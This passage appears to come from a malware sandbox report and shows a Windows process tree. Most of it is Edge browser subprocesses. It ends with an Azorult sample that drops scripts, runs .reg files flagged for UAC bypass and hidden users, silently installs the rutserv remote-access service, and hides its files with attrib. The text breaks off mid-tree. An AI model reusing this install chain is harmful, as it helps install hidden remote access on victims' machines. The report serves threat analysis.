  - Suspicious behavior: EnumeratesProcesses
  PID:4800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1868 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6020 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7068 /prefetch:8
  2⤵
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5032 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:1268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1
  2⤵
  PID:2440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1264 /prefetch:1
  2⤵
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
  2⤵
  PID:1848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
  2⤵
  PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7732 /prefetch:1
  2⤵
  PID:756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7752 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7852 /prefetch:8
  2⤵
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8212 /prefetch:1
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8156 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:1
  2⤵
  PID:4196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8312 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7948 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7952 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:1128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8008 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8236 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:1
  2⤵
  PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8248 /prefetch:1
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1
  2⤵
  PID:432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:1
  2⤵
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8848 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9300 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9628 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9528 /prefetch:1
  2⤵
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9732 /prefetch:1
  2⤵
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9656 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9660 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10088 /prefetch:8
  2⤵
  PID:5812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9300 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9756 /prefetch:8
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9820 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10224 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,10474626818575718289,15520178940262365365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10132 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1912

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3104

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d\" -spe -an -ai#7zMap8796:190:7zEvent3701
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1388

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3632

C:\Users\Admin\Downloads\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.exe
"C:\Users\Admin\Downloads\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.exe"
1⤵
- Executes dropped EXE
PID:2240

C:\Users\Admin\Downloads\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.exe
"C:\Users\Admin\Downloads\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d\fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.exe"
1⤵
- Executes dropped EXE
PID:2784

C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:5288
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1364
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    PID:5688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:5856
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:5768
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:5832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:5872
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5540
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5968
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:6048
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3212
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
